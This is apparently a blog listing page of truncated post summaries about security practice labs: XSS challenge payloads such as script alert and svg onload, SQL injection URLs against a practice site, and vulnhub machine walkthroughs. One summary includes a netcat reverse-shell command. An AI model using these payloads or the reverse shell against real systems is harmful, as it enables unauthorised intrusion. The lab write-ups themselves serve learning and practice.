摘要: X00 <script>alert(1)</script> X01 </textarea><script>alert(1)</script><textarea> X02 "><script>alert(1)</script><" X03 将()替换成空字符 <script>alert`1`</scr 阅读全文
posted @ 2020-07-14 17:51 bingtanghulu 阅读(463) 评论(0) 推荐(0) 编辑
摘要: 第一关 <script>alert(123)</script> "><svg onload=alert(123)> 第二关 <script>alert(123);</script> "><script>alert(123);</script> 或者 "><svg onload=alert(123)> 阅读全文
posted @ 2020-07-14 14:16 bingtanghulu 阅读(194) 评论(0) 推荐(0) 编辑
摘要: http://www.zixem.altervista.org/SQLi/ 第一关 http://www.zixem.altervista.org/SQLi/level1.php?id=1 and 1=1--+ http://www.zixem.altervista.org/SQLi/level1. 阅读全文
posted @ 2020-07-14 14:15 bingtanghulu 阅读(305) 评论(0) 推荐(0) 编辑
摘要: 参考文章https://blog.csdn.net/weixin_30897079/article/details/97314476 第一关 http://www.zixem.altervista.org/XSS/1.php?name=zxm%3Cscript%3Ealert(123)%3C/scr 阅读全文
posted @ 2020-07-14 14:14 bingtanghulu 阅读(273) 评论(0) 推荐(0) 编辑
摘要: 仅供个人娱乐 靶机信息 https://download.vulnhub.com/djinn/djinn.ova 一、主机探测 二、漏洞的查找和利用 21端口ftp 匿名登录 7331端口 命令执行 反弹窗口 nc -e /bin/bash 192.168.174.129 4444 尝试绕过 bas 阅读全文
posted @ 2020-07-14 14:13 bingtanghulu 阅读(270) 评论(0) 推荐(0) 编辑
摘要: 仅供个人娱乐 靶机信息 https://www.vulnhub.com/entry/sunset-sunrise,406/ 一、主机探测 二、信息收集 nmap -sS -sV -T5 -A -p- http://192.168.174.132:8080/ 三、漏洞利用 构造poc http://1 阅读全文
posted @ 2020-07-14 14:12 bingtanghulu 阅读(214) 评论(0) 推荐(0) 编辑
摘要: 仅供个人娱乐 靶机信息 https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 一、主机探测 二、信息收集 访问一下web站点,提示只能从本地登录,否则会被当作hacker拦截。 三、漏洞查找和利用 注册账户登录 信息收集 eweuhtan 阅读全文
posted @ 2020-07-14 14:11 bingtanghulu 阅读(180) 评论(0) 推荐(0) 编辑
摘要: 仅供个人娱乐 靶机信息 下载地址:https://drive.google.com/uc?id=1YzsW1lCKjo_WEr6Pk511DXQBFyMMR14y&export=download 一、主机探测 二、信息收集 22/tcp filtered ssh 53/tcpopendomain 8 阅读全文
posted @ 2020-07-14 14:10 bingtanghulu 阅读(351) 评论(0) 推荐(0) 编辑